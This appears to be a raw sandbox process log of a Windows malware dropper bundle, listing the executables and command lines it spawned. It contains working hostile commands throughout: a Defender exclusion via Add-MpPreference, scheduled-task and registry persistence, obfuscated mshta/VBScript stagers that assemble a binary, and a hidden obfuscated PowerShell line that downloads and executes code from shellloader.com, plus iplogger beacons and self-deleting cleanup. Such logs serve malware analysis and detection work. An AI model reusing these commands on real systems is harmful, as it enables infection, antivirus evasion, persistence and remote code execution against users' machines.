C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed222a0abb0f39640f.exe

Wed222a0abb0f39640f.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22398ca1246818a50.exe

Wed22398ca1246818a50.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22d29285f2462824d.exe /mixone

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed224b216a9b264.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed229825989c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2260b25c317.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22214190470.exe

Wed22214190470.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe

Wed226b251ef55.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed221ce23cd2c4a6.exe

Wed221ce23cd2c4a6.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed224b216a9b264.exe

Wed224b216a9b264.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe

Wed2260b25c317.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2246f9dc6f4f9.exe

Wed2246f9dc6f4f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed229825989c.exe

Wed229825989c.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b6e8b18c18b003.exe

Wed226b6e8b18c18b003.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2236d9fce9bd29d13.exe

Wed2236d9fce9bd29d13.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe

Wed22d29285f2462824d.exe /mixone

C:\Users\Admin\AppData\Local\Temp\is-FLSC3.tmp\Wed221ce23cd2c4a6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FLSC3.tmp\Wed221ce23cd2c4a6.tmp" /SL5="$20114,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed221ce23cd2c4a6.exe"

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-4KO9N.tmp\___YHDG34.exe

"C:\Users\Admin\AppData\Local\Temp\is-4KO9N.tmp\___YHDG34.exe" /S /UID=burnerch2

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe

"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe

"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 656

C:\Users\Admin\AppData\Local\Temp\6.exe

"C:\Users\Admin\AppData\Local\Temp\6.exe"

C:\Users\Admin\AppData\Local\Temp\tmp81CD_tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp81CD_tmp.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\is-0T7B0.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0T7B0.tmp\setup_2.tmp" /SL5="$20226,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 672

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 804

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 680

C:\Users\Admin\AppData\Local\Temp\tmp81CD_tmp.exe

C:\Users\Admin\AppData\Local\Temp\tmp81CD_tmp.exe

C:\Users\Admin\Documents\5O6ugxU4iAizdCOsOUzf93Ux.exe

"C:\Users\Admin\Documents\5O6ugxU4iAizdCOsOUzf93Ux.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 808

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 728

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4452 -s 1528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 480

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 804

C:\Users\Admin\AppData\Local\Temp\tmp81CD_tmp.exe

C:\Users\Admin\AppData\Local\Temp\tmp81CD_tmp.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 888

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 924

C:\Users\Admin\Documents\xsNmhntuwdhsXcmQyFk30teB.exe

"C:\Users\Admin\Documents\xsNmhntuwdhsXcmQyFk30teB.exe"

C:\Users\Admin\Documents\6DYf8aV9Jz2AElnemiC3k5YR.exe

"C:\Users\Admin\Documents\6DYf8aV9Jz2AElnemiC3k5YR.exe"

C:\Users\Admin\Documents\ctZkeR4qh4hAmn_hqfBFKMep.exe

"C:\Users\Admin\Documents\ctZkeR4qh4hAmn_hqfBFKMep.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\7752055.exe

"C:\ProgramData\7752055.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 1092

C:\Users\Admin\AppData\Local\Temp\is-FGU9A.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FGU9A.tmp\setup_2.tmp" /SL5="$20252,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\8675610.exe

"C:\ProgramData\8675610.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\1949878.exe

"C:\ProgramData\1949878.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 936

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\ProgramData\8219754.exe

"C:\ProgramData\8219754.exe"

C:\Users\Admin\Documents\eInBpjSi_JnZBLg3ZoadCv_p.exe

"C:\Users\Admin\Documents\eInBpjSi_JnZBLg3ZoadCv_p.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 480

C:\Users\Admin\Documents\sa_RuxGzoUPFHqQL65yUGh_r.exe

"C:\Users\Admin\Documents\sa_RuxGzoUPFHqQL65yUGh_r.exe"

C:\Users\Admin\Documents\lDwsKOO7FQMzmkU1bza2okTj.exe

"C:\Users\Admin\Documents\lDwsKOO7FQMzmkU1bza2okTj.exe"

C:\Users\Admin\Documents\u6PVvCKnWTCMae0P5gC0EA7A.exe

"C:\Users\Admin\Documents\u6PVvCKnWTCMae0P5gC0EA7A.exe"

C:\Users\Admin\Documents\E6D6G5aiJ96JjukzMockF_ip.exe

"C:\Users\Admin\Documents\E6D6G5aiJ96JjukzMockF_ip.exe"

C:\Users\Admin\Documents\zIgYbBBsMMrpUoo70uGPJZUa.exe

"C:\Users\Admin\Documents\zIgYbBBsMMrpUoo70uGPJZUa.exe"

C:\Users\Admin\Documents\UyRGc9kDCyVN6kCKIAOxnbQH.exe

"C:\Users\Admin\Documents\UyRGc9kDCyVN6kCKIAOxnbQH.exe"

C:\Users\Admin\Documents\3vuqPCimrzIm3N2s5wqtRIzH.exe

"C:\Users\Admin\Documents\3vuqPCimrzIm3N2s5wqtRIzH.exe"

C:\Users\Admin\Documents\yXxT6zPzDY4RUAGoXAKVL1ys.exe

"C:\Users\Admin\Documents\yXxT6zPzDY4RUAGoXAKVL1ys.exe"

C:\Users\Admin\Documents\l8hxMsBs0qmNwbuSKR34ZqDf.exe

"C:\Users\Admin\Documents\l8hxMsBs0qmNwbuSKR34ZqDf.exe"

C:\Users\Admin\Documents\6P5KqTOLKaJJGwXG57YP2yyK.exe

"C:\Users\Admin\Documents\6P5KqTOLKaJJGwXG57YP2yyK.exe"

C:\Users\Admin\Documents\bO9vQMhKJRfO02Z_BSNT9N6a.exe

"C:\Users\Admin\Documents\bO9vQMhKJRfO02Z_BSNT9N6a.exe"

C:\Users\Admin\Documents\Ffutkv5qynNWzC7911KV5AGo.exe

"C:\Users\Admin\Documents\Ffutkv5qynNWzC7911KV5AGo.exe"

C:\Users\Admin\Documents\4D8EqgAv3J5mkWwGw1odD76s.exe

"C:\Users\Admin\Documents\4D8EqgAv3J5mkWwGw1odD76s.exe"

C:\Users\Admin\Documents\Jr2LTCpxw9lq2LtSsSR3_KE0.exe

"C:\Users\Admin\Documents\Jr2LTCpxw9lq2LtSsSR3_KE0.exe"

C:\Users\Admin\Documents\zQOgGbnfZ78jojrB15voMaEE.exe

"C:\Users\Admin\Documents\zQOgGbnfZ78jojrB15voMaEE.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"

C:\Users\Admin\Documents\6P5KqTOLKaJJGwXG57YP2yyK.exe

C:\Users\Admin\Documents\6P5KqTOLKaJJGwXG57YP2yyK.exe

C:\Users\Admin\AppData\Local\Temp\wwi.exe

"wwi.exe"

C:\Users\Admin\Documents\6P5KqTOLKaJJGwXG57YP2yyK.exe

C:\Users\Admin\Documents\6P5KqTOLKaJJGwXG57YP2yyK.exe

C:\Users\Admin\AppData\Local\Temp\wwl.exe

"wwl.exe"

C:\Users\Admin\Documents\Ffutkv5qynNWzC7911KV5AGo.exe

"C:\Users\Admin\Documents\Ffutkv5qynNWzC7911KV5AGo.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"

C:\Users\Admin\Documents\j2AO1lKzQgnvLNopsF4BUsVE.exe

"C:\Users\Admin\Documents\j2AO1lKzQgnvLNopsF4BUsVE.exe"

C:\Users\Admin\Documents\6P5KqTOLKaJJGwXG57YP2yyK.exe

C:\Users\Admin\Documents\6P5KqTOLKaJJGwXG57YP2yyK.exe

C:\Users\Admin\AppData\Local\Temp\tmpBD8E_tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpBD8E_tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpBD8E_tmp.exe

C:\Users\Admin\AppData\Local\Temp\tmpBD8E_tmp.exe

C:\Program Files\Java\OYEBRERMHS\ultramediaburner.exe

"C:\Program Files\Java\OYEBRERMHS\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-OFD1N.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OFD1N.tmp\ultramediaburner.tmp" /SL5="$2036E,281924,62464,C:\Program Files\Java\OYEBRERMHS\ultramediaburner.exe" /VERYSILENT

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Users\Admin\AppData\Local\Temp\bb-03509-6ed-1c18e-eef40d9d18a39\Baewawaesheju.exe

"C:\Users\Admin\AppData\Local\Temp\bb-03509-6ed-1c18e-eef40d9d18a39\Baewawaesheju.exe"

C:\Users\Admin\AppData\Local\Temp\cd-84962-5c2-f2d81-133ef39b5844c\Raelefuzhuvu.exe

"C:\Users\Admin\AppData\Local\Temp\cd-84962-5c2-f2d81-133ef39b5844c\Raelefuzhuvu.exe"

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe

"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"

C:\Program Files (x86)\Company\NewProduct\cm3.exe

"C:\Program Files (x86)\Company\NewProduct\cm3.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\jk847.bat" "

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sfx_123_400.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sfx_123_400.exe"

C:\Program Files (x86)\Company\NewProduct\inst001.exe

"C:\Program Files (x86)\Company\NewProduct\inst001.exe"

C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\Foxynew.exe

Foxynew.exe

C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\FoxyIDS2.exe

FoxyIDS2.exe

C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\Foxynew.exe

Foxynew.exe

C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp

"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Roaming\6558787.scr

"C:\Users\Admin\AppData\Roaming\6558787.scr" /S

C:\Users\Admin\AppData\Local\Temp\is-CLH8T.tmp\postback.exe

"C:\Users\Admin\AppData\Local\Temp\is-CLH8T.tmp\postback.exe" ss1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "3vuqPCimrzIm3N2s5wqtRIzH.exe" /f & erase "C:\Users\Admin\Documents\3vuqPCimrzIm3N2s5wqtRIzH.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\3305005.scr

"C:\Users\Admin\AppData\Roaming\3305005.scr" /S

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "3vuqPCimrzIm3N2s5wqtRIzH.exe" /f

C:\Users\Admin\AppData\Roaming\6541950.scr

"C:\Users\Admin\AppData\Roaming\6541950.scr" /S

C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe

"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe

"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"

C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe

"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBscRiPt:clOsE ( CReAteoBJEct ( "WSCRiPT.ShELL" ). RUN ( "cmD /Q /C copy /Y ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\sfx_123_400.exe"" ZQ5SR.EXe && staRT ZQ5SR.Exe -pjwwaLYSo2g_tTTFZtnj & iF """" == """" for %f IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\sfx_123_400.exe"" ) do taskkill -F -iM ""%~NXf"" " , 0 , TRUE))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im 6DYf8aV9Jz2AElnemiC3k5YR.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\6DYf8aV9Jz2AElnemiC3k5YR.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im 6DYf8aV9Jz2AElnemiC3k5YR.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdhewwql.c5d\JAY.exe & exit

C:\Users\Admin\AppData\Local\Temp\gdhewwql.c5d\JAY.exe

C:\Users\Admin\AppData\Local\Temp\gdhewwql.c5d\JAY.exe

C:\Users\Admin\AppData\Local\Temp\gdhewwql.c5d\JAY.exe

C:\Users\Admin\AppData\Local\Temp\gdhewwql.c5d\JAY.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dyodrja.efu\GcleanerEU.exe /eufive & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\

C:\Users\Admin\AppData\Local\Temp\2dyodrja.efu\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\2dyodrja.efu\GcleanerEU.exe /eufive

C:\Windows\SysWOW64\explorer.exe

explorer.exe ss1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C copy /Y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sfx_123_400.exe" ZQ5SR.EXe && staRT ZQ5SR.Exe -pjwwaLYSo2g_tTTFZtnj & iF "" == "" for %f IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sfx_123_400.exe" ) do taskkill -F -iM "%~NXf"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\csa0rbkk.u42\installer.exe /qn CAMPAIGN="654" & exit

C:\Users\Admin\AppData\Local\Temp\ZQ5SR.EXe

ZQ5SR.Exe -pjwwaLYSo2g_tTTFZtnj

C:\Windows\SysWOW64\taskkill.exe

taskkill -F -iM "sfx_123_400.exe"

C:\Users\Admin\AppData\Local\Temp\csa0rbkk.u42\installer.exe

C:\Users\Admin\AppData\Local\Temp\csa0rbkk.u42\installer.exe /qn CAMPAIGN="654"

C:\Users\Admin\Documents\HLjpzKBJhQfcuqBFILGIXHZZ.exe

"C:\Users\Admin\Documents\HLjpzKBJhQfcuqBFILGIXHZZ.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bs0wdx4z.omc\anyname.exe & exit

C:\Users\Admin\AppData\Local\Temp\bs0wdx4z.omc\anyname.exe

C:\Users\Admin\AppData\Local\Temp\bs0wdx4z.omc\anyname.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBscRiPt:clOsE ( CReAteoBJEct ( "WSCRiPT.ShELL" ). RUN ( "cmD /Q /C copy /Y ""C:\Users\Admin\AppData\Local\Temp\ZQ5SR.EXe"" ZQ5SR.EXe && staRT ZQ5SR.Exe -pjwwaLYSo2g_tTTFZtnj & iF ""-pjwwaLYSo2g_tTTFZtnj "" == """" for %f IN ( ""C:\Users\Admin\AppData\Local\Temp\ZQ5SR.EXe"" ) do taskkill -F -iM ""%~NXf"" " , 0 , TRUE))

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c1hrlqrs.b0n\customer2.exe & exit

C:\Users\Admin\AppData\Local\Temp\c1hrlqrs.b0n\customer2.exe

C:\Users\Admin\AppData\Local\Temp\c1hrlqrs.b0n\customer2.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C copy /Y "C:\Users\Admin\AppData\Local\Temp\ZQ5SR.EXe" ZQ5SR.EXe && staRT ZQ5SR.Exe -pjwwaLYSo2g_tTTFZtnj & iF "-pjwwaLYSo2g_tTTFZtnj " == "" for %f IN ( "C:\Users\Admin\AppData\Local\Temp\ZQ5SR.EXe" ) do taskkill -F -iM "%~NXf"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eej0lvor.dce\gcleaner.exe /mixfive & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"

C:\Users\Admin\AppData\Local\Temp\eej0lvor.dce\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\eej0lvor.dce\gcleaner.exe /mixfive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f4eitqt5.tme\autosubplayer.exe /S & exit

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPt: ClOsE ( CReAteObjEct ( "WSCRiPT.SHeLl" ).ruN ( "CMD.EXE /Q /C echO pKmS0%tIme%YHfyf> 4U4fYQHA.RC & eCHo | sEt /p = ""MZ"" > Tt9MIOo.UY9 & coPy /Y /B Tt9MIOo.UY9 +EEstTh.UzJ + FSEe2D.Dg + MTaSICo.0V + 4U4fYqHA.rC TpTASS.D & STart rundll32 TPTASS.D,VI " , 0, TrUE ) )

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6C8D346F329083BD06B148DDDE7B2627 C

C:\Windows\SysWOW64\cmd.exe

cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\j3ua9egHm.dll"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C echO pKmS0%tIme%YHfyf> 4U4fYQHA.RC & eCHo | sEt /p = "MZ" > Tt9MIOo.UY9 & coPy /Y /B Tt9MIOo.UY9 +EEstTh.UzJ + FSEe2D.Dg +MTaSICo.0V + 4U4fYqHA.rC TpTASS.D & STart rundll32 TPTASS.D,VI

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\j3ua9egHm.dll"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /p = "MZ" 1>Tt9MIOo.UY9"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\system32\regsvr32.exe

/s "C:\Users\Admin\AppData\Local\Temp\j3ua9egHm.dll"

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2dyodrja.efu\GcleanerEU.exe" & exit

C:\Windows\SysWOW64\rundll32.exe

rundll32 TPTASS.D,VI

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "GcleanerEU.exe" /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Local\Temp\RarSFX0\0420b729.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\0420b729.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\Temp\440F.exe

C:\Users\Admin\AppData\Local\Temp\440F.exe

C:\Users\Admin\AppData\Local\Temp\447D.exe

C:\Users\Admin\AppData\Local\Temp\447D.exe

C:\Users\Admin\AppData\Local\Temp\4F1D.exe

C:\Users\Admin\AppData\Local\Temp\4F1D.exe

C:\Users\Admin\AppData\Local\Temp\440F.exe

C:\Users\Admin\AppData\Local\Temp\440F.exe

C:\Windows\SysWOW64\cmd.exe

cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\j3ua9egHm.dll1FRvyKSJV.dll"

C:\Users\Admin\AppData\Local\Temp\5661.exe

C:\Users\Admin\AppData\Local\Temp\5661.exe

C:\Users\Admin\AppData\Local\Temp\4F1D.exe

C:\Users\Admin\AppData\Local\Temp\4F1D.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\InstallTechBrowser.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\InstallTechBrowser.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\j3ua9egHm.dll1FRvyKSJV.dll"

C:\Users\Admin\AppData\Local\Temp\5661.exe

C:\Users\Admin\AppData\Local\Temp\5661.exe

